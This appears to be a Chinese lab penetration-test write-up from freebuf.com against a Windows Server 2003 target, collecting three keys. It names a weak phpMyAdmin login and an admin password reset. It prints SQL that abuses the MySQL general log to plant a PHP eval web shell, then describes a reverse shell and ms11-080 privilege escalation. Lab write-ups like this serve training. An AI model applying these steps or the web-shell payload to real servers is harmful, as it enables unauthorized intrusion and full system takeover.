win03靶机渗透测试
信息搜集
由于已经知道了ip地址,所以这里我们只进行端口扫描
扫描到了80和8866端口。访问80端口时,只出现了php探针;访问8866端口时,出现了metinfo的cms。
这里需要扫描两个网站的子域名。
80端口扫描到了phpmyadmin目录。8866端口扫描到了如下目录。
漏洞利用
8866端口除了登录窗口/member和管理员后台窗口/admin之外,并没有其他的太有用的信息。但是后台管理员密码没有弱口令。这时候我们尝试从/phpmyadmin入手。尝试root/root的弱口令登陆成功。
发现是密文的密码。拿去用md5解密试试看。
解密失败,但是我们可以给admin用户修改密码!将123456拿去做MD5加密,然后添加到数据库中。
成功登入进admin后台,并顺利拿到第一个key。
接下来要做的事就是getshell。尝试了一下后台的文件上传,但是并没有找到文件包含的包含点。所以也值得另寻他路。只好把注意力放在了数据库上面。看一下是否可以在数据库中写入一句话木马。
可以看到secure_file_priv为null,所以传统的数据库文件读写的方式不再适用。但由于我们在数据库中是root权限,所以这里可以通过日志文件来getshell。
getshell
1.先开启全局日志。
set global general_log=on
2.将日志文件写入到1.php中。
set global general_log_file = “C:/phpStudy/WWW/1.php”
3.写入一句话木马。
select ‘<?php @eval($_POST[1])?>’;
现在来getshell。
成功!现在用中国菜刀连接。
连接成功后,拿到了第二个key。
提权
可以看到是windows server 2003的服务器,但是这里只有80和8866端口,所以不能用ms80_067和ms17_010的exp。
先生成一个反弹马,然后传入菜刀。
进入kali的msf监听模块。
再在菜刀中运行反弹马。
成功后,还是win03的权限。我们来查看一下没有打的补丁。
找一个适用于windows2003的exp ms11-080
保存会话之后搜索ms11-080的exp,注意,这里一定要保存会话。
这里唯一的设置就是会话。我们设为会话2
已经进入后门并且是system权限。
成功找到key3.
来源:freebuf.com 2020-08-30 15:06:24 by: Doubt0
请登录后发表评论
注册